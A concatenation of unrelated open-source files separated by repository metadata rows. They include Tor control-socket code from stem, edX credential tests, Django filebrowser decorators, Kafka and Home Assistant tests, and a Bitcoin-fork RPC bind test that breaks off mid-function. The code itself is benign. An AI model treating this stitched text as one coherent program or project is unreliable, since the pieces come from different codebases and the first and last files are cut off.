:func:`stem.socket.ControlSocket.close`, and by extension our
:func:`stem.socket.ControlSocket.is_alive` state changes.
:returns: **threading.RLock** that governs sending messages to our socket
and state changes
"""
return self._send_lock
def __enter__(self):
return self
def __exit__(self, exit_type, value, traceback):
self.close()
def _connect(self):
"""
Connection callback that can be overwritten by subclasses and wrappers.
"""
pass
def _close(self):
"""
Disconnection callback that can be overwritten by subclasses and wrappers.
"""
pass
def _make_socket(self):
"""
Constructs and connects new socket. This is implemented by subclasses.
:returns: **socket.socket** for our configuration
:raises:
* :class:`stem.SocketError` if unable to make a socket
* **NotImplementedError** if not implemented by a subclass
"""
raise NotImplementedError("Unsupported Operation: this should be implemented by the ControlSocket subclass")
class ControlPort(ControlSocket):
"""
Control connection to tor. For more information see tor's ControlPort torrc
option.
"""
def __init__(self, address = "127.0.0.1", port = 9051, connect = True):
"""
ControlPort constructor.
:param str address: ip address of the controller
:param int port: port number of the controller
:param bool connect: connects to the socket if True, leaves it unconnected otherwise
:raises: :class:`stem.SocketError` if connect is **True** and we're
unable to establish a connection
"""
super(ControlPort, self).__init__()
self._control_addr = address
self._control_port = port
if connect:
self.connect()
def get_address(self):
"""
Provides the ip address our socket connects to.
:returns: str with the ip address of our socket
"""
return self._control_addr
def get_port(self):
"""
Provides the port our socket connects to.
:returns: int with the port of our socket
"""
return self._control_port
def is_localhost(self):
return self._control_addr == "127.0.0.1"
def _make_socket(self):
try:
control_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
control_socket.connect((self._control_addr, self._control_port))
return control_socket
except socket.error, exc:
raise stem.SocketError(exc)
class ControlSocketFile(ControlSocket):
"""
Control connection to tor. For more information see tor's ControlSocket torrc
option.
"""
def __init__(self, path = "/var/run/tor/control", connect = True):
"""
ControlSocketFile constructor.
:param str socket_path: path where the control socket is located
:param bool connect: connects to the socket if True, leaves it unconnected otherwise
:raises: :class:`stem.SocketError` if connect is **True** and we're
unable to establish a connection
"""
super(ControlSocketFile, self).__init__()
self._socket_path = path
if connect:
self.connect()
def get_socket_path(self):
"""
Provides the path our socket connects to.
:returns: str with the path for our control socket
"""
return self._socket_path
def is_localhost(self):
return True
def _make_socket(self):
try:
control_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
control_socket.connect(self._socket_path)
return control_socket
except socket.error, exc:
raise stem.SocketError(exc)
def send_message(control_file, message, raw = False):
"""
Sends a message to the control socket, adding the expected formatting for
single verses multi-line messages. Neither message type should contain an
ending newline (if so it'll be treated as a multi-line message with a blank
line at the end). If the message doesn't contain a newline then it's sent
as...
::
<message>\\r\\n
and if it does contain newlines then it's split on ``\\n`` and sent as...
::
+<line 1>\\r\\n
<line 2>\\r\\n
<line 3>\\r\\n
.\\r\\n
:param file control_file: file derived from the control socket (see the
socket's makefile() method for more information)
:param str message: message to be sent on the control socket
:param bool raw: leaves the message formatting untouched, passing it to the
socket as-is
:raises:
* :class:`stem.SocketError` if a problem arises in using the socket
* :class:`stem.SocketClosed` if the socket is known to be shut down
"""
if not raw:
message = send_formatting(message)
try:
control_file.write(stem.util.str_tools._to_bytes(message))
control_file.flush()
log_message = message.replace("\r\n", "\n").rstrip()
log.trace("Sent to tor:\n" + log_message)
except socket.error, exc:
log.info("Failed to send message: %s" % exc)
# When sending there doesn't seem to be a reliable method for
# distinguishing between failures from a disconnect verses other things.
# Just accounting for known disconnection responses.
if str(exc) == "[Errno 32] Broken pipe":
raise stem.SocketClosed(exc)
else:
raise stem.SocketError(exc)
except AttributeError:
# if the control_file has been closed then flush will receive:
# AttributeError: 'NoneType' object has no attribute 'sendall'
log.info("Failed to send message: file has been closed")
raise stem.SocketClosed("file has been closed")
def recv_message(control_file):
"""
Pulls from a control socket until we either have a complete message or
encounter a problem.
:param file control_file: file derived from the control socket (see the
socket's makefile() method for more information)
:returns: :class:`~stem.response.ControlMessage` read from the socket
:raises:
* :class:`stem.ProtocolError` the content from the socket is malformed
* :class:`stem.SocketClosed` if the socket closes before we receive
a complete message
"""
parsed_content, raw_content = [], ""
logging_prefix = "Error while receiving a control message (%s): "
while True:
try:
line = control_file.readline()
if stem.prereq.is_python_3():
line = stem.util.str_tools._to_unicode(line)
except AttributeError:
# if the control_file has been closed then we will receive:
# AttributeError: 'NoneType' object has no attribute 'recv'
prefix = logging_prefix % "SocketClosed"
log.info(prefix + "socket file has been closed")
raise stem.SocketClosed("socket file has been closed")
except (socket.error, ValueError), exc:
# When disconnected we get...
#
# Python 2:
# socket.error: [Errno 107] Transport endpoint is not connected
#
# Python 3:
# ValueError: I/O operation on closed file.
prefix = logging_prefix % "SocketClosed"
log.info(prefix + "received exception \"%s\"" % exc)
raise stem.SocketClosed(exc)
raw_content += line
# Parses the tor control lines. These are of the form...
# <status code><divider><content>\r\n
if len(line) == 0:
# if the socket is disconnected then the readline() method will provide
# empty content
prefix = logging_prefix % "SocketClosed"
log.info(prefix + "empty socket content")
raise stem.SocketClosed("Received empty socket content.")
elif len(line) < 4:
prefix = logging_prefix % "ProtocolError"
log.info(prefix + "line too short, \"%s\"" % log.escape(line))
raise stem.ProtocolError("Badly formatted reply line: too short")
elif not re.match(r'^[a-zA-Z0-9]{3}[-+ ]', line):
prefix = logging_prefix % "ProtocolError"
log.info(prefix + "malformed status code/divider, \"%s\"" % log.escape(line))
raise stem.ProtocolError("Badly formatted reply line: beginning is malformed")
elif not line.endswith("\r\n"):
prefix = logging_prefix % "ProtocolError"
log.info(prefix + "no CRLF linebreak, \"%s\"" % log.escape(line))
raise stem.ProtocolError("All lines should end with CRLF")
line = line[:-2] # strips off the CRLF
status_code, divider, content = line[:3], line[3], line[4:]
if divider == "-":
# mid-reply line, keep pulling for more content
parsed_content.append((status_code, divider, content))
elif divider == " ":
# end of the message, return the message
parsed_content.append((status_code, divider, content))
log_message = raw_content.replace("\r\n", "\n").rstrip()
log.trace("Received from tor:\n" + log_message)
return stem.response.ControlMessage(parsed_content, raw_content)
elif divider == "+":
# data entry, all of the following lines belong to the content until we
# get a line with just a period
while True:
try:
line = control_file.readline()
if stem.prereq.is_python_3():
line = stem.util.str_tools._to_unicode(line)
except socket.error, exc:
prefix = logging_prefix % "SocketClosed"
log.info(prefix + "received an exception while mid-way through a data reply (exception: \"%s\", read content: \"%s\")" % (exc, log.escape(raw_content)))
raise stem.SocketClosed(exc)
raw_content += line
if not line.endswith("\r\n"):
prefix = logging_prefix % "ProtocolError"
log.info(prefix + "CRLF linebreaks missing from a data reply, \"%s\"" % log.escape(raw_content))
raise stem.ProtocolError("All lines should end with CRLF")
elif line == ".\r\n":
break # data block termination
line = line[:-2] # strips off the CRLF
# lines starting with a period are escaped by a second period (as per
# section 2.4 of the control-spec)
if line.startswith(".."):
line = line[1:]
# appends to previous content, using a newline rather than CRLF
# separator (more conventional for multi-line string content outside
# the windows world)
content += "\n" + line
parsed_content.append((status_code, divider, content))
else:
# this should never be reached due to the prefix regex, but might as well
# be safe...
prefix = logging_prefix % "ProtocolError"
log.warn(prefix + "\"%s\" isn't a recognized divider type" % line)
raise stem.ProtocolError("Unrecognized divider type '%s': %s" % (divider, line))
def send_formatting(message):
"""
Performs the formatting expected from sent control messages. For more
information see the :func:`~stem.socket.send_message` function.
:param str message: message to be formatted
:returns: **str** of the message wrapped by the formatting expected from
controllers
"""
# From control-spec section 2.2...
# Command = Keyword OptArguments CRLF / "+" Keyword OptArguments CRLF CmdData
# Keyword = 1*ALPHA
# OptArguments = [ SP *(SP / VCHAR) ]
#
# A command is either a single line containing a Keyword and arguments, or a
# multiline command whose initial keyword begins with +, and whose data
# section ends with a single "." on a line of its own.
# if we already have \r\n entries then standardize on \n to start with
message = message.replace("\r\n", "\n")
if "\n" in message:
return "+%s\r\n.\r\n" % message.replace("\n", "\r\n")
else:
return message + "\r\n"
| gpl-3.0 | 899,650,971,048,636,200 | 31.041118 | 162 | 0.656537 | false |
wmarshall484/streamsx.topology | samples/python/com.ibm.streamsx.topology.pysamples/opt/python/streams/spl_sources.py | 1 | 3031 | # coding:utf-8
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2015, 2016
from __future__ import absolute_import, division, print_function
import sys
# Simple inclusion of Python logic within an SPL application
# as a SPL "Function" operator. A "Function" operator has
# a single input port and single output port, a function
# is called for every input tuple, and results in
# no submission or a single tuple being submitted.
# Import the SPL decorators
from streamsx.spl import spl
# Any function in a Python module (.py file) within the
# toolkit's opt/python/streams directory is converted to a primitive operator
# with a single input and output port. The primitive operator
# is a C++ primitive that embeds the Python runtime.
#
# The function must be decorated with one of these
#
# @spl.pipe - Function is a pipe operator
# @spl.sink - Function is a sink operator
# @spl.ignore - Function is ignored
# Attributes of the input SPL tuple are passed
# as a Python Tuple and thus are available as positional arguments.
# (see examples below)
# Any returned value from a function must be a Tuple.
#
# If nothing is returned then no tuple is submitted
# by the operator for the input tuple.
#
# When a Tuple is returned, its values are assigned
# to the first N attributes of the output tuple,
# that is by position.
# The returned values in the Tuple must be assignable
# to the output tuple attribute types.
#
# If the output port has more than N attributes
# then any remaining attributes are set from the
# input tuple if there is a matching input attribute by
# name and type, otherwise the attribute remains at
# its default value.
#
# If the output port has fewer attributes than N
# then any additional values are ignored.
# Any function whose name starts with spl is not created
# as an operator, such functions are reserved as a mechanism
# to pass information back to the primitive operator generator.
# The description of the function becomes the description
# of the primitive operator model in its operator model.
#------------------------------------------------------------------
# Example functions
#------------------------------------------------------------------
# Defines the SPL namespace for any functions in this module
# Multiple modules can map to the same namespace
def spl_namespace():
return "com.ibm.streamsx.topology.pysamples.sources"
@spl.source()
class Range(object):
def __init__(self, count):
self.count = count
def __iter__(self):
# Use zip to convert the single returned value
# into a tuple to allow it to be returned to SPL
if sys.version_info.major == 2:
# zip behaviour differs on Python 2.7
return iter(zip(range(self.count)))
return zip(range(self.count))
@spl.source()
def Range37():
"""Sample of a function as a source operator."""
if sys.version_info.major == 2:
# zip behaviour differs on Python 2.7
return iter(zip(range(37)))
return zip(range(37))
| apache-2.0 | -8,876,306,261,303,396,000 | 33.83908 | 77 | 0.69779 | false |
TheMOOCAgency/edx-platform | openedx/core/djangoapps/credentials/tests/test_utils.py | 14 | 7362 | """Tests covering Credentials utilities."""
import unittest
from django.conf import settings
from django.core.cache import cache
from nose.plugins.attrib import attr
import httpretty
from edx_oauth2_provider.tests.factories import ClientFactory
from provider.constants import CONFIDENTIAL
from openedx.core.djangoapps.credentials.models import CredentialsApiConfig
from openedx.core.djangoapps.credentials.tests.mixins import CredentialsApiConfigMixin, CredentialsDataMixin
from openedx.core.djangoapps.credentials.utils import (
get_user_credentials,
get_user_program_credentials,
get_programs_credentials
)
from openedx.core.djangoapps.credentials.tests import factories
from openedx.core.djangoapps.programs.tests.mixins import ProgramsApiConfigMixin, ProgramsDataMixin
from openedx.core.djangoapps.programs.models import ProgramsApiConfig
from openedx.core.djangolib.testing.utils import CacheIsolationTestCase
from student.tests.factories import UserFactory
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
@attr(shard=2)
class TestCredentialsRetrieval(ProgramsApiConfigMixin, CredentialsApiConfigMixin, CredentialsDataMixin,
ProgramsDataMixin, CacheIsolationTestCase):
""" Tests covering the retrieval of user credentials from the Credentials
service.
"""
ENABLED_CACHES = ['default']
def setUp(self):
super(TestCredentialsRetrieval, self).setUp()
ClientFactory(name=CredentialsApiConfig.OAUTH2_CLIENT_NAME, client_type=CONFIDENTIAL)
ClientFactory(name=ProgramsApiConfig.OAUTH2_CLIENT_NAME, client_type=CONFIDENTIAL)
self.user = UserFactory()
cache.clear()
def _expected_progam_credentials_data(self):
"""
Dry method for getting expected program credentials response data.
"""
return [
factories.UserCredential(
id=1,
username='test',
credential=factories.ProgramCredential(),
certificate_url=self.CREDENTIALS_API_RESPONSE['results'][0]['certificate_url'],
),
factories.UserCredential(
id=2,
username='test',
credential=factories.ProgramCredential(),
certificate_url=self.CREDENTIALS_API_RESPONSE['results'][1]['certificate_url'],
)
]
def expected_credentials_display_data(self):
""" Returns expected credentials data to be represented. """
program_credentials_data = self._expected_progam_credentials_data()
return [
{
'display_name': self.PROGRAMS_API_RESPONSE['results'][0]['name'],
'subtitle': self.PROGRAMS_API_RESPONSE['results'][0]['subtitle'],
'credential_url':program_credentials_data[0]['certificate_url']
},
{
'display_name': self.PROGRAMS_API_RESPONSE['results'][1]['name'],
'subtitle':self.PROGRAMS_API_RESPONSE['results'][1]['subtitle'],
'credential_url':program_credentials_data[1]['certificate_url']
}
]
@httpretty.activate
def test_get_user_credentials(self):
"""Verify user credentials data can be retrieve."""
self.create_credentials_config()
self.mock_credentials_api(self.user)
actual = get_user_credentials(self.user)
self.assertEqual(actual, self.CREDENTIALS_API_RESPONSE['results'])
@httpretty.activate
def test_get_user_credentials_caching(self):
"""Verify that when enabled, the cache is used for non-staff users."""
self.create_credentials_config(cache_ttl=1)
self.mock_credentials_api(self.user)
# Warm up the cache.
get_user_credentials(self.user)
# Hit the cache.
get_user_credentials(self.user)
# Verify only one request was made.
self.assertEqual(len(httpretty.httpretty.latest_requests), 1)
staff_user = UserFactory(is_staff=True)
# Hit the Credentials API twice.
for _ in range(2):
get_user_credentials(staff_user)
# Verify that three requests have been made (one for student, two for staff).
self.assertEqual(len(httpretty.httpretty.latest_requests), 3)
def test_get_user_program_credentials_issuance_disable(self):
"""Verify that user program credentials cannot be retrieved if issuance is disabled."""
self.create_credentials_config(enable_learner_issuance=False)
actual = get_user_program_credentials(self.user)
self.assertEqual(actual, [])
@httpretty.activate
def test_get_user_program_credentials_no_credential(self):
"""Verify behavior if no credential exist."""
self.create_credentials_config()
self.mock_credentials_api(self.user, data={'results': []})
actual = get_user_program_credentials(self.user)
self.assertEqual(actual, [])
@httpretty.activate
def test_get_user_programs_credentials(self):
"""Verify program credentials data can be retrieved and parsed correctly."""
# create credentials and program configuration
self.create_credentials_config()
self.create_programs_config()
# Mocking the API responses from programs and credentials
self.mock_programs_api()
self.mock_credentials_api(self.user, reset_url=False)
actual = get_user_program_credentials(self.user)
program_credentials_data = self._expected_progam_credentials_data()
expected = self.PROGRAMS_API_RESPONSE['results'][:2]
expected[0]['credential_url'] = program_credentials_data[0]['certificate_url']
expected[1]['credential_url'] = program_credentials_data[1]['certificate_url']
# checking response from API is as expected
self.assertEqual(len(actual), 2)
self.assertEqual(actual, expected)
@httpretty.activate
def test_get_user_program_credentials_revoked(self):
"""Verify behavior if credential revoked."""
self.create_credentials_config()
credential_data = {"results": [
{
"id": 1,
"username": "test",
"credential": {
"credential_id": 1,
"program_id": 1
},
"status": "revoked",
"uuid": "dummy-uuid-1"
}
]}
self.mock_credentials_api(self.user, data=credential_data)
actual = get_user_program_credentials(self.user)
self.assertEqual(actual, [])
@httpretty.activate
def test_get_programs_credentials(self):
""" Verify that the program credentials data required for display can
be retrieved.
"""
# create credentials and program configuration
self.create_credentials_config()
self.create_programs_config()
# Mocking the API responses from programs and credentials
self.mock_programs_api()
self.mock_credentials_api(self.user, reset_url=False)
actual = get_programs_credentials(self.user)
expected = self.expected_credentials_display_data()
# Checking result is as expected
self.assertEqual(len(actual), 2)
self.assertEqual(actual, expected)
| agpl-3.0 | -315,961,971,362,456,300 | 39.01087 | 108 | 0.655393 | false |
vincentfung13/TwitterRepManagement | twitter_services/management/commands/populate_training_set.py | 1 | 2021 | from django.core.management.base import BaseCommand
class Command(BaseCommand):
def __init__(self):
self.duplicates = set()
self.tweets_json = {}
self.ids = set()
def handle(self, **options):
import io
import json
from TwitterRepManagement import settings
from twitter_services.models import TweetTrainingSet
if len(TweetTrainingSet.objects.all()[:1]) > 0:
print 'INFO: Training set table is already populated'
return
with io.open(settings.BASE_DIR + '/resources/twitter_services/pre.3ent.json', 'r',
encoding='utf-8') as all_tweets:
for tweet_str in all_tweets:
tweet_json = json.loads(tweet_str)
tweet_id = tweet_json.get('id_str')
if not self.__check_for_existence__(tweet_id, self.tweets_json):
self.tweets_json[tweet_id] = tweet_json
self.ids.add(tweet_id)
# This is hard-coded to retrieve information for pre.3en.gold file
with io.open(settings.BASE_DIR + '/resources/twitter_services/pre.3ent.gold', 'r',
encoding='utf-8') as classification_results:
for line in classification_results:
tweet_id = line[17:35]
reputation_dimension = line[38:len(line) - 2]
if tweet_id in self.ids:
tweet = self.tweets_json.get(tweet_id)
tweet['reputation_dimension'] = reputation_dimension
self.tweets_json[tweet_id] = tweet
# # Insert to the training set table
for id_str, tweet_json in self.tweets_json.iteritems():
TweetTrainingSet.objects.create(tweet=tweet_json).save()
print 'INFO: Training set table populated.'
def __check_for_existence__(self, tweet_id, tweet_dict):
if tweet_id in tweet_dict:
self.duplicates.add(tweet_id)
return True
else:
return False
| mit | -7,170,286,164,807,566,000 | 37.865385 | 90 | 0.582385 | false |
ricktaylord/django-filebrowser | filebrowser/decorators.py | 1 | 2985 | # coding: utf-8
# PYTHON IMPORTS
import os
import logging
# DJANGO IMPORTS
from django.http import HttpResponseRedirect
from django.utils.translation import ugettext as _
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.core.exceptions import ImproperlyConfigured
from django.utils.encoding import smart_text
# FILEBROWSER IMPORTS
from filebrowser.templatetags.fb_tags import query_helper
def get_path(path, site=None):
"Get path."
logging.debug(path)
logging.debug(site.storage.location)
logging.debug(os.path.join(site.directory, path))
logging.debug(site.storage.isdir(os.path.join(site.directory, path)))
if path.startswith('.') or os.path.isabs(path) or not site.storage.isdir(os.path.join(site.directory, path)):
return None
return path
def get_file(path, filename, site=None):
"Get file (or folder)."
converted_path = smart_text(os.path.join(site.directory, path, filename))
if not site.storage.isfile(converted_path) and not site.storage.isdir(converted_path):
return None
return filename
def path_exists(site, function):
"Check if the given path exists."
def decorator(request, *args, **kwargs):
if get_path('', site=site) is None:
# The storage location does not exist, raise an error to prevent eternal redirecting.
raise ImproperlyConfigured(_("Error finding Upload-Folder (site.storage.location + site.directory). Maybe it does not exist?"))
if get_path(request.GET.get('dir', ''), site=site) is None:
msg = _('The requested Folder does not exist.')
messages.add_message(request, messages.ERROR, msg)
redirect_url = reverse("filebrowser:fb_browse", current_app=site.name) + query_helper(request.GET, u"", "dir")
return HttpResponseRedirect(redirect_url)
return function(request, *args, **kwargs)
return decorator
def file_exists(site, function):
"Check if the given file exists."
def decorator(request, *args, **kwargs):
file_path = get_file(request.GET.get('dir', ''), request.GET.get('filename', ''), site=site)
if file_path is None:
msg = _('The requested File does not exist.')
messages.add_message(request, messages.ERROR, msg)
redirect_url = reverse("filebrowser:fb_browse", current_app=site.name) + query_helper(request.GET, u"", "dir")
return HttpResponseRedirect(redirect_url)
elif file_path.startswith('/') or file_path.startswith('..'):
# prevent path traversal
msg = _('You do not have permission to access this file!')
messages.add_message(request, messages.ERROR, msg)
redirect_url = reverse("filebrowser:fb_browse", current_app=site.name) + query_helper(request.GET, u"", "dir")
return HttpResponseRedirect(redirect_url)
return function(request, *args, **kwargs)
return decorator
| bsd-3-clause | -539,699,391,080,456,770 | 41.042254 | 139 | 0.680067 | false |
fatadama/mavlink-vscl | pymavlink/generator/lib/minixsv/minixsvWrapper.py | 4 | 2320 | #!/usr/local/bin/python
import sys
import getopt
from genxmlif import GenXmlIfError
from xsvalErrorHandler import ErrorHandler, XsvalError
from minixsv import *
from pyxsval import parseAndValidate
##########################################
# minixsv Wrapper for calling minixsv from command line
validSyntaxText = '''\
minixsv XML Schema Validator
Syntax: minixsv [-h] [-?] [-p Parser] [-s XSD-Filename] XML-Filename
Options:
-h, -?: Display this help text
-p Parser: XML Parser to be used
(XMLIF_MINIDOM, XMLIF_ELEMENTTREE, XMLIF_4DOM
default: XMLIF_ELEMENTTREE)
-s XSD-FileName: specify the schema file for validation
(if not specified in XML-File)
'''
def checkShellInputParameter():
"""check shell input parameters."""
xmlInputFilename = None
xsdFilename = None
xmlParser = "XMLIF_ELEMENTTREE"
try:
(options, arguments) = getopt.getopt(sys.argv[1:], '?hp:s:')
if ('-?','') in options or ('-h','') in options:
print validSyntaxText
sys.exit(-1)
else:
if len (arguments) == 1:
xmlInputFilename = arguments[0]
for o, a in options:
if o == "-s":
xsdFilename = a
if o == "-p":
if a in (XMLIF_MINIDOM, XMLIF_ELEMENTTREE, XMLIF_4DOM):
xmlParser = a
else:
print 'Invalid XML parser %s!' %(a)
sys.exit(-1)
else:
print 'minixsv needs one argument (XML input file)!'
sys.exit(-1)
except getopt.GetoptError, errstr:
print errstr
sys.exit(-1)
return xmlInputFilename, xsdFilename, xmlParser
def main():
xmlInputFilename, xsdFileName, xmlParser = checkShellInputParameter()
try:
parseAndValidate (xmlInputFilename, xsdFile=xsdFileName, xmlIfClass=xmlParser)
except IOError, errstr:
print errstr
sys.exit(-1)
except GenXmlIfError, errstr:
print errstr
sys.exit(-1)
except XsvalError, errstr:
print errstr
sys.exit(-1)
if __name__ == "__main__":
main()
| lgpl-3.0 | -4,915,371,194,551,806,000 | 29.526316 | 86 | 0.54569 | false |
gf53520/kafka | tests/unit/directory_layout/check_project_paths.py | 28 | 3699 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from kafkatest.directory_layout.kafka_path import create_path_resolver, KafkaSystemTestPathResolver, \
KAFKA_PATH_RESOLVER_KEY
from kafkatest.version import V_0_9_0_1, DEV_BRANCH, KafkaVersion
class DummyContext(object):
def __init__(self):
self.globals = {}
class DummyPathResolver(object):
"""Dummy class to help check path resolver creation."""
def __init__(self, context, project_name):
pass
class DummyNode(object):
"""Fake node object"""
pass
class CheckCreatePathResolver(object):
def check_create_path_resolver_override(self):
"""Test override behavior when instantiating a path resolver using our factory function.
If context.globals has an entry for a path resolver class, use that class instead of the default.
"""
mock_context = DummyContext()
mock_context.globals[KAFKA_PATH_RESOLVER_KEY] = \
"unit.directory_layout.check_project_paths.DummyPathResolver"
resolver = create_path_resolver(mock_context)
assert type(resolver) == DummyPathResolver
def check_create_path_resolver_default(self):
"""Test default behavior when instantiating a path resolver using our factory function.
"""
resolver = create_path_resolver(DummyContext())
assert type(resolver) == KafkaSystemTestPathResolver
def check_paths(self):
"""Check expected path resolution without any version specified."""
resolver = create_path_resolver(DummyContext())
assert resolver.home() == "/opt/kafka-dev"
assert resolver.bin() == "/opt/kafka-dev/bin"
assert resolver.script("kafka-run-class.sh") == "/opt/kafka-dev/bin/kafka-run-class.sh"
def check_versioned_source_paths(self):
"""Check expected paths when using versions."""
resolver = create_path_resolver(DummyContext())
assert resolver.home(V_0_9_0_1) == "/opt/kafka-0.9.0.1"
assert resolver.bin(V_0_9_0_1) == "/opt/kafka-0.9.0.1/bin"
assert resolver.script("kafka-run-class.sh", V_0_9_0_1) == "/opt/kafka-0.9.0.1/bin/kafka-run-class.sh"
def check_node_or_version_helper(self):
"""KafkaSystemTestPathResolver has a helper method which can take a node or version, and returns the version.
Check expected behavior here.
"""
resolver = create_path_resolver(DummyContext())
# Node with no version attribute should resolve to DEV_BRANCH
node = DummyNode()
assert resolver._version(node) == DEV_BRANCH
# Node with version attribute should resolve to the version attribute
node.version = V_0_9_0_1
assert resolver._version(node) == V_0_9_0_1
# A KafkaVersion object should resolve to itself
assert resolver._version(DEV_BRANCH) == DEV_BRANCH
version = KafkaVersion("999.999.999")
assert resolver._version(version) == version
| apache-2.0 | -5,203,107,733,110,843,000 | 40.1 | 117 | 0.691538 | false |
auduny/home-assistant | tests/components/heos/test_config_flow.py | 6 | 4313 | """Tests for the Heos config flow module."""
import asyncio
from homeassistant import data_entry_flow
from homeassistant.components.heos.config_flow import HeosFlowHandler
from homeassistant.components.heos.const import DATA_DISCOVERED_HOSTS, DOMAIN
from homeassistant.const import CONF_HOST, CONF_NAME
async def test_flow_aborts_already_setup(hass, config_entry):
"""Test flow aborts when entry already setup."""
config_entry.add_to_hass(hass)
flow = HeosFlowHandler()
flow.hass = hass
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
assert result['reason'] == 'already_setup'
async def test_no_host_shows_form(hass):
"""Test form is shown when host not provided."""
flow = HeosFlowHandler()
flow.hass = hass
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'user'
assert result['errors'] == {}
async def test_cannot_connect_shows_error_form(hass, controller):
"""Test form is shown with error when cannot connect."""
flow = HeosFlowHandler()
flow.hass = hass
errors = [ConnectionError, asyncio.TimeoutError]
for error in errors:
controller.connect.side_effect = error
result = await flow.async_step_user({CONF_HOST: '127.0.0.1'})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'user'
assert result['errors'][CONF_HOST] == 'connection_failure'
assert controller.connect.call_count == 1
assert controller.disconnect.call_count == 1
controller.connect.reset_mock()
controller.disconnect.reset_mock()
async def test_create_entry_when_host_valid(hass, controller):
"""Test result type is create entry when host is valid."""
flow = HeosFlowHandler()
flow.hass = hass
data = {CONF_HOST: '127.0.0.1'}
result = await flow.async_step_user(data)
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result['title'] == 'Controller (127.0.0.1)'
assert result['data'] == data
assert controller.connect.call_count == 1
assert controller.disconnect.call_count == 1
async def test_create_entry_when_friendly_name_valid(hass, controller):
"""Test result type is create entry when friendly name is valid."""
hass.data[DATA_DISCOVERED_HOSTS] = {"Office (127.0.0.1)": "127.0.0.1"}
flow = HeosFlowHandler()
flow.hass = hass
data = {CONF_HOST: "Office (127.0.0.1)"}
result = await flow.async_step_user(data)
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result['title'] == 'Controller (127.0.0.1)'
assert result['data'] == {CONF_HOST: "127.0.0.1"}
assert controller.connect.call_count == 1
assert controller.disconnect.call_count == 1
assert DATA_DISCOVERED_HOSTS not in hass.data
async def test_discovery_shows_create_form(hass, controller, discovery_data):
"""Test discovery shows form to confirm setup and subsequent abort."""
await hass.config_entries.flow.async_init(
DOMAIN, context={'source': 'discovery'},
data=discovery_data)
await hass.async_block_till_done()
assert len(hass.config_entries.flow.async_progress()) == 1
assert hass.data[DATA_DISCOVERED_HOSTS] == {
"Office (127.0.0.1)": "127.0.0.1"
}
discovery_data[CONF_HOST] = "127.0.0.2"
discovery_data[CONF_NAME] = "Bedroom"
await hass.config_entries.flow.async_init(
DOMAIN, context={'source': 'discovery'},
data=discovery_data)
await hass.async_block_till_done()
assert len(hass.config_entries.flow.async_progress()) == 1
assert hass.data[DATA_DISCOVERED_HOSTS] == {
"Office (127.0.0.1)": "127.0.0.1",
"Bedroom (127.0.0.2)": "127.0.0.2"
}
async def test_disovery_flow_aborts_already_setup(
hass, controller, discovery_data, config_entry):
"""Test discovery flow aborts when entry already setup."""
config_entry.add_to_hass(hass)
flow = HeosFlowHandler()
flow.hass = hass
result = await flow.async_step_discovery(discovery_data)
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
assert result['reason'] == 'already_setup'
| apache-2.0 | 5,080,596,128,137,261,000 | 38.935185 | 77 | 0.669372 | false |
HaloExchange/HaloBitcoin | qa/rpc-tests/rpcbind_test.py | 1 | 5788 | #!/usr/bin/env python2
# Copyright (c) 2014 The Halo Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# Test for -rpcbind, as well as -rpcallowip and -rpcconnect
# Add python-halobitcoinrpc to module search path:
import os
import sys
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "python-halobitcoinrpc"))
import json
import shutil
import subprocess
import tempfile
import traceback
from halobitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from util import *
from netutil import *
def run_bind_test(tmpdir, allow_ips, connect_to, addresses, expected):
'''
Start a node with requested rpcallowip and rpcbind parameters,
then try to connect, and check if the set of bound addresses
matches the expected set.
'''
expected = [(addr_to_hex(addr), port) for (addr, port) in expected]
base_args = ['-disablewallet', '-nolisten']
if allow_ips:
base_args += ['-rpcallowip=' + x for x in allow_ips]
binds = ['-rpcbind='+addr for addr in addresses]
nodes = start_nodes(1, tmpdir, [base_args + binds], connect_to)
try:
pid = halobitcoind_processes[0].pid
assert_equal(set(get_bind_addrs(pid)), set(expected))
finally:
stop_nodes(nodes)
wait_halobitcoinds()
def run_allowip_test(tmpdir, allow_ips, rpchost, rpcport):
'''
Start a node with rpcwallow IP, and request getinfo
at a non-localhost IP.
'''
base_args = ['-disablewallet', '-nolisten'] + ['-rpcallowip='+x for x in allow_ips]
nodes = start_nodes(1, tmpdir, [base_args])
try:
# connect to node through non-loopback interface
url = "http://rt:rt@%s:%d" % (rpchost, rpcport,)
node = AuthServiceProxy(url)
node.getinfo()
finally:
node = None # make sure connection will be garbage collected and closed
stop_nodes(nodes)
wait_halobitcoinds()
def run_test(tmpdir):
assert(sys.platform == 'linux2') # due to OS-specific network stats queries, this test works only on Linux
# find the first non-loopback interface for testing
non_loopback_ip = None
for name,ip in all_interfaces():
if ip != '127.0.0.1':
non_loopback_ip = ip
break
if non_loopback_ip is None:
assert(not 'This test requires at least one non-loopback IPv4 interface')
print("Using interface %s for testing" % non_loopback_ip)
defaultport = rpc_port(0)
# check default without rpcallowip (IPv4 and IPv6 localhost)
run_bind_test(tmpdir, None, '127.0.0.1', [],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check default with rpcallowip (IPv6 any)
